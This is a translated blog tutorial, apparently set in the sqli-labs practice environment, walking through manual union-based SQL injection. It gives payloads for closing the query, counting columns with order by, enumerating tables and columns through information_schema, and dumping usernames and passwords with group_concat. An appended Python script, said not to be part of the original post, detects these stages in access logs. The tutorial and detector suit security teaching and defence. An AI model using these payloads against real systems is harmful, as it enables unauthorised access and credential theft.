Manual error-based SQL injection

Disclaimer: This is an original article by the blogger, released under the CC 4.0 BY-SA license. When reposting, please include the original source link and this statement.
Original link: https://blog.csdn.net/qq_23066945/article/details/102771727


Experiment Environment: sqlli
1. The page first prompts us to supply the ID as a parameter with a value.
2. Supplying the id parameter returns a normal page.
3. Enter the escape character \ to obtain an error message. The fragment shown inside its quotation marks is "1") LIMIT 0,1 (the screenshot showed the error message itself, so the two enclosing quotation marks are removed here).
From this we can infer that the SQL statement is roughly:

select * from users where id=("1") limit 0,1

Next, try to close the quotation mark and parenthesis and comment out the rest by entering 1") --+

select * from users where id=("1") --+ ") limit 0,1

The page returns normally.

4. After closing the statement, use order by to determine the number of fields. Enter 5 and check whether the page returns normally.
With 5 fields an error is raised, so try 4 and then 3.
With order by 3 the page returns normally, indicating that there are three fields.
5. Next, use a union query to see which positions are displayed.
First, make the original query return nothing by setting id to -1.
Second, construct the statement union select 1,2,3 (three fields were detected earlier).
The page shows 2 and 3, which means positions 2 and 3 return the values we want.
Replace 2 with database() to view the current database; it is displayed successfully.
6. Next, dump the data.
First, look up the table names.
Input:

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 

This concatenates and displays the table names from MySQL's information_schema.tables, filtered to rows whose table_schema equals the name of the current database.
It shows all the tables in the current database.
We continue by reading the column information of the users table.
Input:

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

This concatenates and displays the column names from MySQL's information_schema.columns, selecting the rows whose table name equals users.
Then get the field values, that is, the username and password values.
Input:

union select 1,group_concat(username,0x3a,password),3 from users --+

This reads the data from the users table and displays each username and password separated by a colon.
And finally we get the information we wanted.
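
Each step above leaves a recognizable value in the id parameter of the web server's access log. The following is an added example, not part of the original post, that classifies those values over constructed sample log lines; the log format, the /lab/ path, the addresses and the stage names are assumptions, as is the rule that a legitimate id is a plain positive integer.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Patterns for the stages of the walkthrough, applied to the URL-decoded id value.
STAGES = [
    ("escape_probe", re.compile(r"\\$")),                         # step 3: trailing backslash
    ("comment_tail", re.compile(r"--\s+$")),                      # "--+" decodes to "-- "
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),  # step 4
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),    # step 5
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),   # step 6
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the stage names an id value matches; [] for a plain positive integer."""
    if re.fullmatch(r"\d+", value):
        return []
    hits = [name for name, rx in STAGES if rx.search(value)]
    return hits or ["non_numeric_id"]

def scan(log_lines, param="id"):
    """Map client address -> stages seen, in first-seen order."""
    seen = {}
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):
            for stage in classify(value):
                stages = seen.setdefault(client, [])
                if stage not in stages:
                    stages.append(stage)
    return seen

# Constructed sample access-log lines (addresses, path and timestamps are placeholders).
T = "- - [01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 {T} "GET /lab/?id=1 HTTP/1.1" 200 512',
    f'203.0.113.5 {T} "GET /lab/?id=1%5C HTTP/1.1" 200 640',
    f'203.0.113.5 {T} "GET /lab/?id=1%22)+--+ HTTP/1.1" 200 512',
    f'203.0.113.5 {T} "GET /lab/?id=1%22)+order+by+3+--+ HTTP/1.1" 200 512',
    f'203.0.113.5 {T} "GET /lab/?id=-1%22)+union+select+1,2,3+--+ HTTP/1.1" 200 512',
    f'203.0.113.5 {T} "GET /lab/?id=-1%22)+union+select+1,group_concat(table_name),3'
    '+from+information_schema.tables+where+table_schema=database()+--+ HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for client, stages in scan(SAMPLE_LOG).items():
        print(client, stages)
```

A client that progresses through several of these stages in order is a much stronger signal than any single match, and the same allow-list (id must be a positive integer) is also the simplest input check to enforce before the value reaches the query.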

End.

If you have any questions, feel free to tell big cousin.
